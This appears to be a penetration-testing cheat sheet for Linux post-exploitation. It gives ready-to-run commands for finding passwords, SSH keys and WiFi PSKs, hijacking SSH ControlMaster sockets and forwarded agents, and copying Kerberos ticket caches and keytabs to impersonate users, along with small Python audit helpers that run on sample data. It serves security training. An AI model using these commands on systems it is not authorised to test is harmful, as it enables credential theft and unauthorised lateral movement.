# Linux

## Introduction

This section contains useful commands for enumerating a Linux system and gathering information that supports later privilege escalation or lateral movement.

## User and group enumeration

* Print real and effective user and group IDs from the current user: `id`
* List all users, groups and shells for each user: `cat /etc/passwd`
* List user accounts that do not require a password (empty hash field in `/etc/shadow`):

```bash
sudo awk -F: '($2==""){print}' /etc/shadow
```

* List the allowed (and forbidden) commands for the invoking or specified (`-u`) user: `sudo -l`
* List all existing groups: `cat /etc/group | sort`
* Print previously executed commands (look for credentials): `cat ~/.bash_history` or `history`
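As an added example (not part of the original cheat sheet), the following Python reproduces the `cat /etc/passwd` and `awk -F: '($2==""){print}' /etc/shadow` checks over constructed sample content, so it runs without root, and also flags every UID 0 account and ignores locked or shell-less entries that the bare `awk` would not distinguish:

```python
# Added example (not from the original cheat sheet): the same checks as
# `cat /etc/passwd` and `awk -F: '($2==""){print}' /etc/shadow`, run over
# constructed sample content so it works without root access.

# Constructed sample data, not from a real host.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
guest:x:1001:1001:Guest:/home/guest:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
"""

SHADOW = """\
root:$6$saltsalt$abcdefghijklmnop:19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
toor:!:19500:0:99999:7:::
alice:$6$saltsalt$qrstuvwxyz:19500:0:99999:7:::
guest::19500:0:99999:7:::
sync::19500:0:99999:7:::
"""

# Shells that never give an interactive session.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_colon_file(text):
    """Map account name -> list of fields for passwd/shadow style files."""
    entries = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            entries[fields[0]] = fields
    return entries


def uid0_accounts(passwd_text):
    """All accounts with UID 0: each of them is root-equivalent."""
    return sorted(n for n, f in parse_colon_file(passwd_text).items() if f[2] == "0")


def passwordless_logins(passwd_text, shadow_text):
    """Accounts with an empty shadow hash field that also have a usable shell.

    Empty means no password is asked for. Locked accounts ('!' or '*') and
    accounts without a login shell are not reported.
    """
    shells = {n: f[6] for n, f in parse_colon_file(passwd_text).items()}
    return sorted(n for n, f in parse_colon_file(shadow_text).items()
                  if f[1] == "" and shells.get(n) not in NOLOGIN_SHELLS)
```

On a live host, read the real files (shadow needs root) and pass their contents to the two functions.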

## Operating System

* **Architecture**:

```bash
uname -a
```

* **Environment variables**:

```bash
env
```

## Network Enumeration

* List network interfaces: `ip -br a`
* List all connections: `netstat -putona`
* List only listening ports: `netstat -plunt` or `ss -pltn`
* List hardcoded domains: `cat /etc/hosts`
* List iptables: `iptables -L`
* Outgoing connections to a specific IP: `ss -anpt | grep <NETWORK> | grep ESTAB`
* Real-time traffic monitoring: `tcpdump -i <if> -s0 -n -vv`
* Obtain WiFi passwords: `sudo grep psk= /etc/NetworkManager/system-connections/*`

## Files enumeration

### Files owned by a user

There might be files owned by a specific user or group stored in hidden folders. The parentheses are needed so that `-type f` applies to both sides of the `-o`:

```bash
find / -type f \( -user <user> -o -group <group> \) 2>/dev/null | grep -v '^/proc'
```

### Modified files

Files modified by a cron job or during working hours can be located by modification time:

```bash
find / -type f -newermt "<start date>" ! -newermt "<end date>" 2>/dev/null
```

### Accessed files

Files accessed by a cron job or during working hours can be located by access time (only meaningful if the filesystem is not mounted with `noatime`):

```bash
find / -type f -newerat "<start date>" ! -newerat "<end date>" 2>/dev/null
```

### Disks

List the filesystems mounted at startup (credentials for network shares sometimes appear here):

```bash
cat /etc/fstab
```

## Password Enumeration

Look for files that contain passwords or keys.

```bash
# Passwords (no -w here: "passw" must match inside "password")
grep -rni "passw" / --color=always 2>/dev/null
grep -i passw ~/.bash_history
# Find SSH keys
find / -type f -name id_rsa 2>/dev/null
grep -rnw '/' -ie "private key" --color=always 2>/dev/null
```

## Cronjobs

List scheduled jobs (the system crontab and the current user's crontab).

```bash
cat /etc/crontab
crontab -l
```

## SSH

* Find SSH keys:

```bash
find /home/ -iname "id_rsa"
find /home/ -iname "*.key"
```

### **Control Master**

When ControlMaster is enabled, the first SSH connection to a host (the master connection) is established through a local Unix socket, and subsequent connections to the same host reuse that master connection. This gives faster connection times and lower resource usage, especially when connecting to the same remote server repeatedly.

If an attacker gains access to a system where SSH ControlMaster is in use, they might exploit the existing master connection to execute commands or perform other malicious activities without the need to authenticate repeatedly.

1. Check whether `~/.ssh/config` exists and contains a configuration like the following, which means ControlMaster is enabled.

```bash
Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m
```

2. Look for any active connection under `~/.ssh/controlmaster/`.

```bash
offsec@controller:~$ ls -al ~/.ssh/controlmaster/
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec    0 May 13 13:55 offsec@linuxvictim:22
```

3. Use the existing connection to perform lateral movement.

* **User**: If you are the user who owns the control socket, simply SSH to the same host; the client finds the socket through `ControlPath` and reuses the master connection.

```bash
ssh offsec@linuxvictim
```

* **Root**:

```bash
ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim
```

### **SSH Agent Forwarding**

SSH Agent Forwarding allows the SSH-Agent on a local machine to be used for authentication when connecting to remote servers.

If an attacker gains access to a machine where Agent Forwarding is active, they might abuse the forwarded agent connection to authenticate to other machines.

Check whether `~/.ssh/config` on the client contains `ForwardAgent yes`; for forwarding to work, the server's `/etc/ssh/sshd_config` must also have `AllowAgentForwarding yes`. Then check whether there is any active connection.

```bash
ps aux | grep ssh
```

* **User**: If you are the user to whom the connection belongs, the forwarded agent is already available in your session, so running `ssh` to the next host authenticates automatically.
* **Root**: Inspect processes with "ssh" in their name to find open connections from the host, then pass the usernames from those connections to `pstree` to get the process IDs (PIDs) of the SSH processes.

```bash
pstree -p <USER> | grep ssh
sshd(15228)---bash(15229)---su(15241)---bash(15242)
sshd(16380)---bash(16381)
```

Then, we extract the `SSH_AUTH_SOCK` environment variable from their session to obtain the path of the forwarded agent socket (`environ` is NUL-separated, so `tr` makes it readable):

```bash
tr '\0' '\n' < /proc/16381/environ | grep SSH_AUTH_SOCK
```

After that, point `ssh-add` at that socket to list the identities loaded in the forwarded agent:

```bash
root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
```

Finally, we can connect to the target the victim's session is reaching, or look for clues about which hosts that user connects to:

```bash
ss -ntp | grep ':22' | grep -i ssh
```
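The ControlMaster and Agent Forwarding checks above can be scripted as a read-only audit. The following Python is an added example, not code from the original cheat sheet: it parses `ssh_config` text per `Host` block for `ControlMaster`, `ControlPersist` and `ForwardAgent`, and extracts `SSH_AUTH_SOCK` from the NUL-separated `/proc/<pid>/environ` format. The config text and environ bytes are constructed samples (the `jump` host is invented).

```python
# Added example (not from the original cheat sheet): read-only audit for the
# ControlMaster and Agent Forwarding exposures described above.
# SSH_CONFIG and ENVIRON are constructed samples, not data from a real host.

SSH_CONFIG = """\
# multiplex everything (layout as in the cheat sheet)
Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m
Host jump
    ForwardAgent yes
"""

# /proc/<pid>/environ content: NUL-separated KEY=VALUE pairs.
ENVIRON = b"SHELL=/bin/bash\0USER=offsec\0SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380\0"


def parse_ssh_config(text):
    """Return {host_pattern: {option_lowercase: value}} for each Host block."""
    blocks, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and indentation
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "host":
            current = blocks.setdefault(value.strip(), {})
        elif current is not None:
            current[key.lower()] = value.strip()
    return blocks


def risky_hosts(text):
    """Host blocks that keep a reusable master socket or forward the agent."""
    checks = {"controlmaster": lambda v: v != "no",    # yes/auto/ask/autoask
              "controlpersist": lambda v: v != "no",   # yes or a duration
              "forwardagent": lambda v: v == "yes"}
    out = {}
    for host, opts in parse_ssh_config(text).items():
        hits = [k for k, ok in checks.items() if ok(opts.get(k, "no").lower())]
        if hits:
            out[host] = hits
    return out


def auth_sock_from_environ(data):
    """SSH_AUTH_SOCK value from /proc/<pid>/environ bytes, or None if absent."""
    for item in data.split(b"\0"):
        if item.startswith(b"SSH_AUTH_SOCK="):
            return item.split(b"=", 1)[1].decode()
    return None
```

On a live host, feed it the contents of `~/.ssh/config` and of `/proc/<pid>/environ` for the PIDs found with `pstree`.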

## Kerberos

Kerberos tickets can also be found on Linux machines joined to Active Directory domains. Enumerating the machine for Kerberos material can be crucial for lateral movement to other machines in the domain.

* **Obtain domain information from the Kerberos configuration file.**

```bash
cat /etc/krb5.conf
```

* **Find KRB user cache credentials.**

```bash
find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null
```

* **Impersonate user using `krb5cc_` files.**

```bash
sudo cp /tmp/krb5cc_* /tmp/krb5cc_minenow
sudo chown <ATTACKER_USER>:<ATTACKER_USER> /tmp/krb5cc_minenow
kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
```

* **Find keytab files.**

```bash
find / -type f -iname "*.keytab" 2>/dev/null
ls /etc/krb5.*
```

* **Extract keytab information like domain, service principal and NTLM hash.**

```bash
python3 KeyTabExtract/keytabextract.py krb5.keytab 
```

* **List tickets currently stored in the user’s credential cache file.**

```bash
klist
```

* **Convert a Mimikatz ticket to ccache.**

```bash
ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache
export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache
```
